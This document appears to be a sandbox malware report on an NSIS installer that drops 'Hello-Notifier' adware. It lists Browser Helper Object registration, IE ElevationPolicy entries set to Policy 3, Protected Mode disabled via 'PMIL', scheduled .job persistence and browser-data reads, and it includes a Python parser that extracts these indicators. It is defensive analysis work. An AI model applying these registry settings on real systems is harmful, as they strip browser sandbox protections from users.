PID 3008 is the 64-bit rundll32.exe, which re-launches the same command line under SysWOW64\rundll32.exe (PID 4876) because the plugin DLL is 32-bit. A parent writing into a child it has just created is part of ordinary process start-up, and the sandbox raises this signature for it; on its own it is not evidence of injection.

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\StdUtils.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4876 -ip 4876

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 612

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 66.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

This is the network profile of an idle Windows 10 sandbox image (Bing endpoints plus reverse lookups of the addresses it contacted). The only code from the sample that ran in this detonation crashed on load, so none of these connections should be attributed to the sample without further evidence.

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-10-25 22:18

Reported

2024-10-25 22:20

Platform

win7-20240903-en

Max time kernel

15s

Max time network

17s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2808 -s 224

Network

N/A

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-25 22:18

Reported

2024-10-25 22:20

Platform

win10v2004-20241007-en

Max time kernel

115s

Max time network

118s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe"

Signatures

Checks for common network interception software

evasion

ACProtect 1.3x - 1.4x DLL software

Description Indicator Process Target
N/A N/A N/A N/A

Event Triggered Execution: Component Object Model Hijacking

persistence privilege_escalation

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Installs/modifies Browser Helper Object

stealer adware
Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128} C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128} C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128}\ = "CrossriderApp0037928" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128}\NoExplorer = "1" C:\Windows\system32\regsvr32.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128}\NoExplorer = "1" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128}\ = "CrossriderApp0037928" C:\Windows\system32\regsvr32.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-buttonutil64.dll C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\37928.xpi C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-helper.exe C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-buttonutil64.exe C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Installer.log C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\utils.exe C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Uninstall.exe C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier.ico C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bho.dll C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-updater.exe C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-buttonutil.exe C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-buttonutil.dll C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bho64.dll C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\background.html C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File opened for modification C:\Program Files (x86)\Hello-Notifier\Uninstall.exe C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Tasks\Hello-Notifier-enabler.job C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File opened for modification C:\Windows\Tasks\temp_Hello-Notifier-enabler.job C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Windows\Tasks\Hello-Notifier-updater.job C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File opened for modification C:\Windows\Tasks\Hello-Notifier-updater.job C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Windows\Tasks\Hello-Notifier-firefoxinstaller.job C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File opened for modification C:\Windows\Tasks\Hello-Notifier-firefoxinstaller.job C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Windows\Tasks\Hello-Notifier-codedownloader.job C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File opened for modification C:\Windows\Tasks\Hello-Notifier-codedownloader.job C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Windows\Tasks\Hello-Notifier-enabler.job C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
File created C:\Windows\Tasks\temp_Hello-Notifier-enabler.job C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
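As an added example that is not part of the sandbox report, the following Python script parses rows in the flattened "Description Indicator Process Target" layout used on this page and pulls out what an analyst would want from the Browser Helper Object table, the Windows directory table above, and the "Modifies Internet Explorer settings" rows further down: the BHO CLSID that regsvr32 registers (native and WOW6432Node views), the Low Rights ElevationPolicy entries that let the Hello-Notifier binaries start from IE outside Protected Mode (Policy = 3), the Isolation/CheckedValue writes that switch Enhanced Protected Mode off, and the .job files dropped into C:\Windows\Tasks. The row regexes, the Policy-value meanings (taken from Microsoft's Protected Mode documentation) and the reading of "PMIL" as "EPM off" are the example's own assumptions; the embedded sample rows are copied from this report's behavioral2 tables.

```python
import re
from collections import defaultdict

# Policy DWORD under ...\Internet Explorer\Low Rights\ElevationPolicy\{GUID} (Microsoft's Protected
# Mode docs); 3 = IE starts the program silently at medium integrity, i.e. outside its sandbox.
ELEVATION_POLICY = {0: "blocked", 1: "silent, low integrity",
                    2: "prompt, then medium integrity", 3: "silent, medium integrity (bypass)"}

# Row layout as flattened on this page: <action> <path>[ = "<value>"] <process> <target>
REG_ROW = re.compile(r'^(?P<action>Key created|Key deleted|Key opened|Set value \((?:str|int)\))\s+'
                     r'(?P<path>\\REGISTRY\\.+?)(?:\s+=\s+"(?P<value>[^"]*)")?\s+'
                     r'(?P<process>[A-Za-z]:\\.+?)\s+N/A$')
FILE_ROW = re.compile(r'^(?P<action>File created|File opened for modification)\s+'
                      r'(?P<path>[A-Za-z]:\\.+?)\s+(?P<process>[A-Za-z]:\\.+?)\s+N/A$')
GUID_RE = re.compile(r'\{([0-9A-Fa-f-]+)\}')
BHO_MARK = r'\Explorer\Browser Helper Objects\{'
ELEV_MARK = r'\Internet Explorer\Low Rights\ElevationPolicy\{'
EPM_MARKS = (r'\Internet Explorer\Main\Isolation',
             r'\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY\CheckedValue')


def parse_row(line):
    """Return ('reg'|'file', fields) for one table row, or None if the line is not a row."""
    line = line.strip()
    m = REG_ROW.match(line)
    if m:
        row = m.groupdict()
        row["hive"] = "HKLM" if row["path"].startswith(r"\REGISTRY\MACHINE") else "HKU"
        row["wow64"] = "\\WOW6432Node\\" in row["path"]
        row["leaf"] = row["path"].rsplit("\\", 1)[-1]   # value name; '' is the (Default) value
        return "reg", row
    m = FILE_ROW.match(line)
    return ("file", m.groupdict()) if m else None


def analyse(lines):
    """Collect BHO CLSIDs, ElevationPolicy entries, EPM tampering and dropped .job tasks."""
    bho = defaultdict(lambda: {"name": None, "no_explorer": False, "hives": set(), "processes": set()})
    elev = defaultdict(lambda: {"AppName": None, "AppPath": None, "Policy": None})
    epm_tamper, jobs, unparsed = [], set(), []
    for line in lines:
        parsed = parse_row(line)
        if parsed is None:
            unparsed.append(line)
            continue
        kind, row = parsed
        path, action = row["path"], row["action"]
        if kind == "file":
            if path.lower().startswith("c:\\windows\\tasks\\") and path.lower().endswith(".job"):
                jobs.add(path)                        # legacy Task Scheduler job file = persistence
        elif BHO_MARK in path and action != "Key deleted":   # regsvr32 deletes, then re-creates
            e = bho[GUID_RE.search(path).group(1)]
            e["hives"].add(row["hive"] + ("/WOW64" if row["wow64"] else ""))
            e["processes"].add(row["process"])
            if row["leaf"] == "" and action.startswith("Set value"):
                e["name"] = row["value"]
            elif row["leaf"] == "NoExplorer" and row["value"] == "1":
                e["no_explorer"] = True               # load in IE only, not in Windows Explorer
        elif ELEV_MARK in path:
            e = elev[GUID_RE.search(path).group(1)]
            if row["leaf"] in ("Policy", "AppName", "AppPath") and row["value"] is not None:
                e[row["leaf"]] = int(row["value"]) if row["leaf"] == "Policy" else row["value"]
        elif any(path.endswith(mark) for mark in EPM_MARKS) and row["value"] == "PMIL":
            # PMIL is what IE stores with Enhanced Protected Mode OFF; a CheckedValue of PMIL
            # means ticking the Advanced-settings box no longer turns it on (assumed reading).
            epm_tamper.append(row["leaf"])
    bypass = sorted(e["AppName"] for e in elev.values() if e["Policy"] == 3 and e["AppName"])
    return {"bho": dict(bho), "elevation": dict(elev), "protected_mode_bypass": bypass,
            "epm_tamper": epm_tamper, "jobs": sorted(jobs), "unparsed": unparsed}


# Rows copied from the behavioral2 tables on this page (a constructed subset used as test input).
SAMPLE_ROWS = [
    r'Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128} C:\Windows\SysWOW64\regsvr32.exe N/A',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128}\ = "CrossriderApp0037928" C:\Windows\SysWOW64\regsvr32.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128}\NoExplorer = "1" C:\Windows\system32\regsvr32.exe N/A',
    r'Key deleted \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{11111111-1111-1111-1111-110311791128} C:\Windows\system32\regsvr32.exe N/A',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppName = "Hello-Notifier-codedownloader.exe" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A',
    r'Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\Policy = "1" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A',
    r'Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Isolation = "PMIL" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A',
    r'Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions\CRYPTO\PROTECTEDMODESECURITY\CheckedValue = "PMIL" C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A',
    r'File created C:\Windows\Tasks\Hello-Notifier-updater.job C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A',
    'N/A N/A N/A N/A',
]


def main():
    r = analyse(SAMPLE_ROWS)
    for clsid, e in r["bho"].items():
        print(f"BHO {{{clsid}}} {e['name']!r} in {sorted(e['hives'])} via {sorted(e['processes'])}")
    for e in r["elevation"].values():
        print(f"ElevationPolicy {e['AppName']}: Policy={e['Policy']} ({ELEVATION_POLICY.get(e['Policy'])})")
    print({k: r[k] for k in ("protected_mode_bypass", "epm_tamper", "jobs", "unparsed")})


if __name__ == "__main__":
    main()
```

Run it as-is for the embedded rows, or feed analyse() the rows of any signature table on this page. Rows it cannot parse (empty "N/A N/A N/A N/A" tables, headings) are returned under unparsed rather than silently dropped, so a change in the report layout shows up immediately instead of as missing findings.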

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-firefoxinstaller.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-bg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1999c56ab4a4e37c0c4b35f1a859926b1a5c082a12167106de4f955de3f83d25N.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-codedownloader.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\regsvr32.exe N/A

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppPath = "C:\\Program Files (x86)\\Hello-Notifier" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{cbc148be-08f7-4781-8fc7-fd545f7678f0}\AppName = "Hello-Notifier-helper.exe" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{d0007729-ce2c-4588-ad99-017a0258ae89}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{12835ba8-ee00-4d15-b54a-a933332b83e4}\AppName = "Hello-Notifier-bg.exe" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{718F2CC1-8611-4C30-858F-4FA0ECD619AD} C:\Program Files (x86)\Hello-Notifier\Hello-Notifier-enabler.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{7e5bffe2-2164-4778-8938-2ec4e833d3e0}\AppName = "Hello-Notifier-codedownloader.exe" C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{8e0202ae-cd8e-4894-b24e-f2cd7839a7f0} C:\Users\Admin\AppData\Local\Temp\nsn9B09.tmp\Ewfmukuhwkg.exe N/A
